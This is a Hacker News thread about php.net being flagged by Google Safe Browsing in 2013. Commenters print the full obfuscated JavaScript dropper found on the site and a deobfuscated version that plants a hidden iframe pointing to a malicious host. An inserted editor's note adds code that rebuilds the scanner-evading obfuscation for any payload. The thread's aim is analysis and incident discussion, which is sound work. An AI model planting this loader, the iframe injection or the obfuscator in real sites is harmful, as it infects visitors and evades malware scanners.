
Php.net detected as a malware host by Google Safe Browsing - nivla
http://www.google.com/safebrowsing/diagnostic?site=http://php.net/manual/en/function.next.php&hl=en
======
pierrefar
I work at Google and was the one who posted on our forums about this.

What our systems found was definitely a compromised JS file, and others on
this thread have posted something similar to what we saw. This is not a false
positive.

We have detailed help for webmasters in this kind of situation:

[http://www.google.com/webmasters/hacked/](http://www.google.com/webmasters/hacked/)

One thing that I strongly suggest to any webmaster in this situation is to
look for any server vulnerability that allowed this file to get compromised in
the first place. We sometimes see webmasters simply fix the affected files
without digging into security hole that allowed the hack, which leaves the
server vulnerable for repeat attacks.

Happy to answer questions.

~~~
jimbobsyourmom
You sir, get -9,001 Internets.

There are huge repercussions for any website that gets blacklisted with the
Stop Badware clearinghouse, the least of which is the inability to figure out
exactly where the problem actually is because the company you work for's
information for a webmaster to resolve the problem is ridiculously minimal.
There are no notifications (unless you are signed up for Google Webmaster
Tools) and restoring a website to normal globally can take anywhere from 48
hours to two weeks. There are millions of developers who rely on the PHP
website daily for performing their day jobs and you've now made it that much
harder for us to do our jobs.

Stop Badware needs a serious overhaul. At the very least, they should contact
the contacts in the WHOIS record for the domain BEFORE doing anything. Give
the website owners 24 hours to resolve the issue before blacklisting the site.
And give them a heck of a lot more information to go on than some vague text.

Also, there are several anti-virus vendors out there who use the clearinghouse
database for their products...6 to 12 months after the original blacklisting.
So this will happen all over again 6 to 12 months from now. Finding contacts
for anti-virus vendors for removing domain blocks is a lot harder than removal
from the blacklist on the Stop Badware site.

The CORRECT solution for this situation was to find a contact at PHP who could
resolve the issue quickly and amicably. Seriously, how hard is it to locate
Rasmus' e-mail address? Always try to find a human contact before using Stop
Badware. You can chalk using Stop Badware for the PHP website as being the
dumbest decision you've made this year. Hopefully this decision of yours will
raise the ire of the Internet just enough to force the company you work for to
revamp Stop Badware so it doesn't suck, Google Webmaster Tools so they don't
suck, and the reporting tools for sending information to Stop Badware so they
also don't suck.

~~~
Silhouette
_Stop Badware needs a serious overhaul. At the very least, they should contact
the contacts in the WHOIS record for the domain BEFORE doing anything._

Why? This isn't a responsible disclosure, "we found a potential vulnerability
but we don't know if it's being exploited yet" kind of situation. This is a
"there's a real threat to anyone visiting that site via your search engine
right now" kind of situation.

As a user, I'd be much happier if the search engine flagged this immediately.

As a site owner, if someone found malware on my site I'd want to know ASAP
too. Obviously it would be helpful if they sent me a notification and made the
specific details of the identified threat available. However, I could hardly
criticise them for blacklisting my site while it should be blacklisted, or for
claiming that we were dangerous while we were actually serving malware.

Not clearing up the blacklists promptly after the threat is identified and
removed is an entirely different question. If you're going to go around
blacklisting sites then I think you also have a responsibility (and, for that
matter, you should also have a legal obligation) to remove them from the
blacklist with similar efficiency if you're notified that the threat has been
removed. Claiming that someone's site is dangerous when it isn't is
defamatory, and should be treated as such.

------
dscrd
Everybody seems to laugh and rage about this, but could somebody tell me if
this is correctly detected or not? I would not be surprised at all if somebody
had breached php.net. Did they properly check against intrusions?

~~~
karma_fountain
It's weird. The file linked to in the google product forums
([http://static.php.net/www.php.net/userprefs.js](http://static.php.net/www.php.net/userprefs.js))
definitely has a piece of obfuscated js to insert an iframe pointing to
[http://lnkhere.reviewhdtv.co.uk/stat.htm](http://lnkhere.reviewhdtv.co.uk/stat.htm).
The actual [http://www.php.net/userprefs.js](http://www.php.net/userprefs.js)
does not though.

~~~
smsm42
It was changed to un-confuse whatever tool google is using. No version on
github has obfuscated contents (see: [https://github.com/php/web-php/commits/master/userprefs.js](https://github.com/php/web-php/commits/master/userprefs.js))
but it does include another file
([https://github.com/php/web-php/commits/master/functions.js](https://github.com/php/web-php/commits/master/functions.js))
which did have obfuscated contents. Where did the version that inserts the
iframe to the uk site come from?

~~~
karma_fountain
1) When I go to static userprefs.js on my mobile, no obfuscated contents.

2) Now when I browse to static userprefs.js on my desktop in incognito mode,
no obfuscated contents.

3) When I browse to static userprefs.js in normal mode I get the following js
appended:

    
    
        (function (MH) {
            var aS = "\x96\xad\xa1\xb4\x87\xf8J\x04Y.C\xb4u>\xac\xa8\x95\xbd\x04x\x8e\xa6:\x8c\x00O\x0b`\x04\x20-M@O\x00\x0d+\x0c\x0b\x04IM\x00d\x0fhbH"+
                     "mOO\x08J-\x0a.`iK\x00\x20(\x0b\x08)MM\x00d\x0bhKbmbb\x0bJ-\x09-`OhDf\x08)*B1*C0k\x0d,j2\x0c5+;|C\x19qSu\x1bgT`?\x0c\"1N'v\x0b-,H8"+
                     "ky6Er\x04!]\x19uVD.\x20\x15$qe\x20S>:sU\x1e:2#\x13MQ\x1c<\x20\x02)\x0eSTBlf\x05?62:`In\x17T&\x0c\"\x1e7Y\x01X@\x00/.q\x12\"\x08f#"+
                     "\x04k\x0a\x15`k.\x15rf\x0cbS\x20|x\x106CZ\x14\x18Xu1>:rXy\x0evb\x0d,q\x16\x06j\x025U\"cX\x15y|<2W~\x16\x032-T\x15\x17\\\\q\x01\x03"+
                     "\x09g\x00/.q\x12\"\x08f^\x1as$\x13f\x0e\x20i\x08Ur&H`\x1dd\x17Pt|{\x18Xu5@kn5\x14$*bx\"Yc-&}?~~2Afm\x0c\x11T\x04j`^5tRb\x0d]\x08\"]"+
                     "\x19uVD.\x20\x129wq9S\\\x1e:Qv`+lqVBhBv^?id\x20\x0dh\x11v\"*@\x1e:Rr1<\x00xx\x13&9`\x09,wPd\x0cfzWzA\x06\x1e\x1eBknW\x16B(\x06a\x00q\x02)"+
                     "\x7f*q\x19\x1f\x11v\"*@t9F`k.\x15rf\x0cb[6|\"g{S\x06m\x19\x0c6?9\x17\x14\x06j`8;\x10@Q\x1aBk\x0cUt`*\x06w4\x03\x0f~#f\x1e\x18rw\x20i\x08U"+
                     "r&H`|x\x15`!D\x18<\x11p^\x1apr<:r6\x1c\\2\x14\x1c\x18s\x18\"\x0b*Wr\"l\x02~dF\x16h<:s`\x1c\\7B\x1c\x18rC<i~U@#\x18XucDs\x14M%\x1ezp\x11:"+
                     "\x12\x1c\x18s\x144^w=x<tA!]>:u\x06\x1e:3s\x02A@\x1c\x18sC~T_\x20\x0dh\x11v\"*@!\x1eB\x1e:0px\\\x06i=nT=y6.\x14ht\x0ct.R\x1fy\x14\x19q_}"+
                     "\x0ct\x7fr=\x7fZ[@]2y\x19\x1fA\x1f2?\x1fj\x13\x19s_i\x0d[E\x1bS\x1f};V]0y\x1f&{p_?\x7f0;q\x1f9hP[\x15\x1d]jT[\x12[?^\x1f&{t_?\x19#;r\x1f"+
                     "_hW[\x14\x1dIk{ay5_ym\x1fA\x1f3?\x1f\x7f\x14\x19s_\x1bE[\x16\x1d=\x7fR[\x16[9P\x1fu}\x1fc9u\x1f=\x7f0Ypy;P\x1bQ\x1f{ay>_yy6{u_Y6\x19Q\x1f"+
                     "\x19c\x1b\x1d]y}\x12\x19\x12]\x19.*P\x1fp}yx9\x20\x19P\x1f\x1fY!\x7f5y\x1dH1{0\x7f/+\x7f>\x1fA\x1f4?\x1f\x19\x02\x19s_\x1d\x0cz\x7f!;t}]"+
                     "ydY\x16\x19\x19\x08m(\x16\x19v=\x19\x20Ysy]\x0d\x1dI\x19A[\x16[_\x0c0\x1f\x10\x19+9#\x19T\x1f\x1f*4\x7f2yi[?\x09;zo?\x0c\"1N'v\x0b-,H\x10"+
                     "\x0cui_gR&H\x10nw\x0b=fA(!T!\"\x12\x14\x0a[&'n%Pe\x04\x156$\x1bdGjgP!dx-9\x06'.\x056'\"'Rf\x1f$\x05.EtG&Zg\x7f9\x09\x7fk\x04j\x10.5\x19W"+
                     "\x16B(\x06v\x1dqq}s8^\\up\x02m_9\x17\x14\x06j`^8\x160Sq\x20+G$~~2\x15b\x01\x02m__\x7f\x176$j\x20qY=p<1f|x\x123\x20\x0dm?x-*0\x0c5I?'n3A"+
                     "{M&H\x10nwySTBlf\x1326\x03$\x13^\x1e:3txx\x15%)!fsNW$\x06m\x19\x09?P,5\x195\x14$*b\x17v\x10!\x06\x13\x1e\\Z76x<uE\x0da$1.1d`+\x1d\x0cUr&H`"+
                     "|x\x130_x<uD#^\x1au$:f\x1ezp\x11<p\x1c<\x1fWfs6\x20\x0dh\"U*a\x16+-\x0ejky\x18M(v\x0e\x17k\x1b}\x0b=\x7fA(7E?P,5\x195\x14$*b\x17f\x00\x05"+
                     "\x13\x1e|\\Z77x<u\x16sL\x06`k=j\x17T&\x0c\"\x19<\\\x09QP\x00/.B1*C0k\x0d,jI9\x1akhvNSi[?\x09;_{\x7f\x0dl3I*f\x0d5k[",
                Z7 = ["\x73\x70\x6c\x69\x74", XC = 0x09 * 17, "\x6c\x65\x6e\x67\x74\x68", "\x68\x61\x73\x4f\x77\x6e\x50\x72\x6f\x70\x65\x72\x74\x79"],
                Jm = "\xd5\xb6\xf9\x89\x9eT\x1a\xe4\x9a\x87\xd3\x16r\xa4\x99}Q\x8c\xc8\xe3t\xf4\xf9\xedC",
                jS = aS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, Jm[Z7[2]]);
            UVf = function (wD) {
                var Np, uK, Ugx = uK = "",
                    DUB = 0;
                wD = wD[Z7[0]](Ugx);
                for (Np in wD) {
                    if (wD[Z7[3]](Np)) {
                        uK += pVH(wD[Np], jS[Z7[0]](Ugx)[DUB %= jS[Z7[2]]]);
                        DUB++;
                    }
                }
                return (uK);
            };
            jS = UVf(Jm);
            MH[UVf("'t!H")](UVf(aS[UVf("1w\"WtV)\x0e%")](Jm[UVf(".g.CtL")])))
        })(window, pVH = function (g6D, FFl, LyS, mnT) {
            g6D = g6D[LyS = "\x63" + (mnT = "\x68\x61\x72\x43\x6f\x64\x65") + "\x41\x74"](0);
            return (String["\x66\x72\x6f\x6d\x43" + mnT](g6D & XC | ((g6D & (~XC & 0xff)) ^ (FFl[LyS](0) & (~XC & 0xff)))))
        });
    
    
    

4) When I control F5 the page to refresh, obfuscated contents are gone.

So I'm leaning towards it being hacked a while ago and the hacked version was
in my cache.

~~~
ingenter
This code deobfuscates basically to

    
    
        // create the hidden iframe that loads the remote page
        tmp3 = (tmp2 = document.createElement('iframe')).style;
        tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.htm';
        // wrap it in a div pushed far off-screen so nothing is visible
        tmp1 = (tmp0 = document.createElement('div')).style;
        tmp1.width = tmp1.height = '-10000px';
        tmp1.overflow = 'hidden'; tmp1.position = 'absolute'; tmp1.left = '-10000px';
        // attach the wrapper under a randomly chosen existing div on the page
        tmp4 = document.getElementsByTagName('div');
        tmp4[Math.floor(Math.random() * tmp4.length)].appendChild(tmp0).appendChild(tmp2);
    

Wrapped into onload.
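
Added example (editor's note, not part of the thread and not code from php.net or any poster): the `pVH`/`UVf` pair in the blob karma_fountain posted is a repeating-key XOR that only touches the bits outside the mask `XC = 0x09 * 17` (0x99); the bits under the mask are copied straight from the ciphertext, which is why the blob still looks like half-readable text. The loader takes the leading `Jm.length` characters of `aS` as a throwaway key, decodes `Jm` with it to get the real key, then decodes the rest of `aS` and hands the result to a four-character method looked up on `window` (the string lengths fit `eval`, `substring` and `length`, but that is an inference, not something the page decodes). The JavaScript below re-implements that transform in plain form so you can confirm it is its own inverse and walk the two-stage key derivation; `maskedXor`, `deriveKey`, `decodePayload`, `buildSample`, the sample payload and the keys are all constructed for this example.

```javascript
// Added example: the masked repeating-key XOR behind the posted loader,
// written out plainly. MASK is the original's XC; everything else
// (function names, sample payload, keys) is constructed for illustration.
const MASK = 0x09 * 17;      // 0x99: these bits are copied from the ciphertext
const FLIP = ~MASK & 0xff;   // 0x66: only these bits are XORed with the key

// The original pVH(g6D, FFl): one character in, one character out.
// Byte-oriented like the original: code points above 0xff are truncated.
function maskedXorChar(c, k) {
  const a = c.charCodeAt(0);
  const b = k.charCodeAt(0);
  return String.fromCharCode((a & MASK) | ((a & FLIP) ^ (b & FLIP)));
}

// The original UVf(wD): walk the string, cycling through the key.
function maskedXor(text, key) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    out += maskedXorChar(text[i], key[i % key.length]);
  }
  return out;
}

// Stage 1 of the loader: the first encKey.length characters of the blob are a
// throwaway key used only to decode the real key (Jm in the original).
function deriveKey(blob, encKey) {
  const prelim = blob.substring(0, encKey.length);
  return maskedXor(encKey, prelim);
}

// Stage 2: decode the remainder of the blob with the real key. The original
// then passes the result to a method looked up on window (eval-style).
function decodePayload(blob, encKey) {
  const key = deriveKey(blob, encKey);
  return maskedXor(blob.substring(encKey.length), key);
}

// Build a blob/encKey pair the way the dropper's author must have: encrypt
// the payload with the real key, then hide the real key behind the blob's own
// leading characters. Works because maskedXor with a fixed key is an involution.
function buildSample(payload, realKey, prelim) {
  if (realKey.length !== prelim.length) throw new Error('prelim must be as long as the key');
  const blob = prelim + maskedXor(payload, realKey);
  const encKey = maskedXor(realKey, prelim);
  return { blob, encKey };
}

// Constructed demo payload: a benign stand-in for the iframe dropper above.
const DEMO_PAYLOAD = "document.body.appendChild(document.createElement('iframe'))";
const DEMO = buildSample(DEMO_PAYLOAD, 'Q7x$zMp2', 'PRELIM!!');

console.log('blob      :', JSON.stringify(DEMO.blob));
console.log('real key  :', JSON.stringify(deriveKey(DEMO.blob, DEMO.encKey)));
console.log('recovered :', decodePayload(DEMO.blob, DEMO.encKey));
```

Because the mask bits pass through untouched, a quarter of every plaintext byte (bit 7 and bits 0x19) is visible in the ciphertext, so this is obfuscation against pattern-matching scanners rather than encryption; once the two-stage key derivation is understood, any sample can be decoded offline without running it, which is the safer way to see what the payload does.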

~~~
hwh
I really love that part where a random div is selected for inserting the
iframe...

~~~
officialjunk
If there is one. Could be a little more robust :)

~~~
oneeyedpigeon
Obviously the hackers have a thing about non-semantic markup :-)

(yes, yes, I know that DIVs aren't really non-semantic - it's a joke)

------
bmfet
I'd say the tool is broken:

[http://www.google.com/safebrowsing/diagnostic?site=http://go...](http://www.google.com/safebrowsing/diagnostic?site=http://google.com)

It reports google.com for 142 exploit(s), 131 trojan(s), 98 scripting
exploit(s)

~~~
smsm42
For php.net, it reports only a mere 4 trojans. So php.net is almost 100 times
safer than google.com, according to this tool. That sounds pretty good :)

~~~
camus2
> For php.net, it reports only a mere 4 trojans. So php.net is almost 100 times
> safer than google.com, according to this tool. That sounds pretty good :)

Compare how many google.com pages have been tested with how many php.net pages
have been tested and stop with that nonsense.

------
dpeck
There seems to be some controversy here, and one of our research systems found
the same problem. So here's a quick post and a link to the full pcap so you can
see for yourselves.

[http://barracudalabs.com/2013/10/php-net-compromise/](http://barracudalabs.com/2013/10/php-net-compromise/)

Cheers.

~~~
JohnTHaller
Not sure if you're associated with that site, but it's kinda hard to read that
article: [http://imgur.com/lyeZ9qZ](http://imgur.com/lyeZ9qZ)

Windows, Firefox 24.0

~~~
dpeck
ugh, yeah, I'm just a bit associated with it :)

I think our social media coordinator got a little happy with the options. For
now disable JS to get a nice read, I'll see about getting that fixed.

EDIT: fixed, looks like last update of WP-Socializer introduced the bug.
Disabled for the time being. Thank you and sibling poster for pointing it out.

------
KamiNuvini
They're working on it:
[http://productforums.google.com/forum/#!topic/webmasters/puL...](http://productforums.google.com/forum/#!topic/webmasters/puLmvjtK0m8)

------
nathancahill
Interesting that satnavreviewed.co.uk, obbcountybankruptcylawyer.com,
stephaniemari.com, and northgadui.com are all owned by the same GoDaddy
account.

~~~
tobyjsullivan
Yeah, presumably the one godaddy account got hijacked, then used as a host for
the malicious file.

A good reminder that anyone's low-profile website may not seem a tempting
target, but it's still very much at risk.

------
alphadevx
This is what happens when you give too much power to one company. And what is
the appeal process? Asking for help on Twitter as the founder of a huge
project like PHP?
[https://twitter.com/rasmus/status/393258264034422785](https://twitter.com/rasmus/status/393258264034422785)

~~~
dchest
_This is what happens when you give too much power to one company._

What happens? Is it bad that Google protects users from malware and
notifies webmasters that their website was compromised?

~~~
bowlofpetunias
Google doesn't notify anybody, you have to find out for yourself the hard way.

And after that, it forces the owners of the site to register with Google and
use Google services just to even figure out why, and to get their sites
unflagged. And that is after the owner even figured out how and where to
contact Google.

~~~
MertsA
Google sends out emails to a bunch of different addresses like
webmaster@domain.com, abuse@domain.com, etc and notifies anyone signed up
through Google Webmaster tools. The only improvement I can think of would be
if they notified whoever was listed after doing a WHOIS of the domain but
that's a little hard to automate.

>And after that, it forces the owners of the site to register with Google and
use Google services just to even figure out why, and to get their sites
unflagged.

Google forces you to prove that you own the domain before they give you any
information that they don't release publicly. How else do you suggest they go
about not releasing everything publicly? Also, all you have to do as a site
owner is click on the safe browsing diagnostic link and go from there.

~~~
david_acw
In our case the email alerts went out 12 hours after they identified our site
and started giving the warning to users. We got several calls from customers
before being notified by Google.

------
jes
Hey, PHP isn't perfect, but calling it malware seems over the top! /rimshot

Thank you, thank you, ladies and gentlemen, I'll be here all week!

~~~
topac
ba dum tss

~~~
jayzalowitz
But in all seriousness, php is not the bad guy here, bad coders are.

~~~
dscrd
Are you referring to the people who implemented PHP? Because I would be.

------
ars
A site I visit frequently was once identified as containing malware. I
overrode it and went there anyway. (In firefox.)

And now forevermore the icon for that site in the url-bar dropdown is the
warning icon, and I have not been able to find out how to change it back to
the normal one.

~~~
agilebyte
Explicitly visit the url of that favicon in the browser and hard reload the
page. That usually works for me.

~~~
ars
The icon is correct in tabs (and by correct I mean not there - the site has no
favicon), it's only incorrect in the url-drop down (the arrow in the url box
which shows you the most visited pages).

------
curiousquestion
[http://php.mirrors.pair.com/](http://php.mirrors.pair.com/)

~~~
smsm42
That's a pretty outdated mirror :)

~~~
curiousquestion
7 months in "web years" is pretty old, but as you know PHP has been around a
long time, so there's still a lot of relevant information for those who depend
on the site.

------
camus2
Well somebody screwed up here. Maybe PHP core developers should concentrate
on the security of their own website, it's more than embarrassing. There is
no reason why php.net should use anything more than a static site generator.

~~~
ds9
From the headers, php.net seems to be Apache/PHP on BSD. This might be an
example of a widespread ongoing attack pattern which is a bit of a mystery.

For the past year or more there have been compromises in this pattern -
Linux/unix platform, Apache webserver; foreign Javascript or PHP gets inserted
somehow; and/or in some cases the server binary is replaced. Sample article:
[http://arstechnica.com/security/2013/04/exclusive-ongoing-ma...](http://arstechnica.com/security/2013/04/exclusive-ongoing-malware-attack-targeting-apache-hijacks-20000-sites/) - you can find more on this.

The big question is how the original exploit happens. It may be a long-out-
there 0-day, or some admin tool that the sites have in common, or credentials
taken from compromised boxes of developers, or something else.

Edited to update info.

------
sarreph
This happened to [http://www.iphonedevsdk.com](http://www.iphonedevsdk.com) a
while ago and did a good job of tarnishing its reputation, all as a result of
an arbitrary flag.

~~~
Hoff
Serious question: this "arbitrary flag" would possibly be in reference to this
widely-reported watering hole attack[1] (or was that attack misreported?), or
are you referring to some other issue with that web site?

[1] [http://arstechnica.com/security/2013/02/dev-site-behind-appl...](http://arstechnica.com/security/2013/02/dev-site-behind-apple-facebook-hacks-didnt-know-it-was-booby-trapped/)

------
ma2rten
So was the site of the Thai Police with information on how to get a police
clearance. Very confusing. However, it seems to be fixed now.

------
LawnGnome
An update has been posted on this:
[http://php.net/archive/2013.php#id2013-10-24-1](http://php.net/archive/2013.php#id2013-10-24-1)

tl;dr: Relevant services moved to new servers; investigation continuing. Post
mortem to follow once that's done.

------
wil421
Ha I live in Cobb County I wonder if that's a good bankruptcy lawyer.

------
16s
False positives are the life of security. Microsoft Updates
(update.microsoft.com) was just blacklisted by malwaredomains this week. It
happens. Algorithms are not humans.

~~~
02
This was a true positive.

------
guard-of-terra
Malware detectors are usually right if overzealous.

------
cryptos
This relates to the website, but maybe there should be malware warnings for
programming languages too ;-)

------
maxk42
If someone managed to compromise something like the PHP binaries they could
cause a lot of damage.

~~~
smsm42
Main php.net site doesn't have binaries, only sources. windows.php.net has
Windows binaries, other sites - like Linux distros - have others.

All php releases are signed and checksummed on the d/l page.

------
jeena
Hm, so is my Firefox getting this list directly from Google or how does it
work?

~~~
dangrossman
Yes, Firefox downloads a list of suspicious sites from Google every 30
minutes. It uses the Google Safe Browsing Protocol --

[https://code.google.com/p/google-safe-browsing/wiki/Protocol...](https://code.google.com/p/google-safe-browsing/wiki/Protocolv2Spec)

~~~
eli
Nitpick: it's a list of _hashes_ of suspicious URLs.

------
ebarock
They should have already fixed it; the file they are mentioning, this
"userprefs.js", is not harmful.

------
edem
Maybe they used PHP to create the site. :)

------
srajbr
whats the news from [http://php.net/](http://php.net/) webmaster???

~~~
dingdingdang
yup, can we please have some official voice provide a bit of background data
here?!

------
dlsym
Sure, there are many reasons to dislike PHP. But I wouldn't go as far and call
it a malware.

------
igl00
still funny ;)

------
finalight
if so, that means facebook is also a malware :D

~~~
camus2
facebook hardly uses the PHP interpreter, they have their own PHP VM, HHVM.

~~~
wyck
Considering the compromise was a js script and most likely had nothing to do
with PHP, both these comments are not relevant.

------
FridayWithJohn
According to Twitter post by Rasmus
([https://twitter.com/rasmus/status/393258264034422785](https://twitter.com/rasmus/status/393258264034422785))
this has been like this for at least 1 day and still has not been fixed.
Something tells me that Google has way too much power and the fact that they
don't sort out false positives in a timely fashion is really bad.

~~~
dchest
PHP webmasters didn't fix the issue and you're complaining about Google?

------
dancecodes
it is not surprising

~~~
dancecodes
why? see the sources of the php.net project for this site

------
okonomiyaki3000
Yeah, what gives?

------
nodesocket
Honestly, I feel like there is nerd rage here; php.net should in no way ever
be flagged as malware. Clearly a failure in Google here.

~~~
brazzy
Not sure if you're joking or lacking knowledge. Just because it's the official
PHP site does absolutely NOT mean it cannot contain malware. Legitimate sites
are compromised and used to spread malware all the damn time.

~~~
smsm42
But in this case it looks like Google tool found legit, but obfuscated file,
which was loaded in some tricky way that bad sites usually use, and decided
it's a malware.

------
bhhaskin
One reason I migrated away from php is the fact that there are simply way too
many attack vectors. Using frameworks helps quite a bit, but it is too easy to
misconfigure a stock php install. Not saying that is the case here though.

~~~
dkloke
you do realize that this is a javascript exploit? just sayin.

~~~
camus2
and how did the js exploit end up on their servers? through php code likely.

~~~
eksith
That's speculation. I've seen servers get compromised due to FTP problems, SSH
misconfiguration, unpatched Apache vulnerabilities, third-party stats
monitoring software with 0-days and even SQL injection.

Defacement (I consider malware injection a form of defacement) isn't unique to
PHP by a long shot.

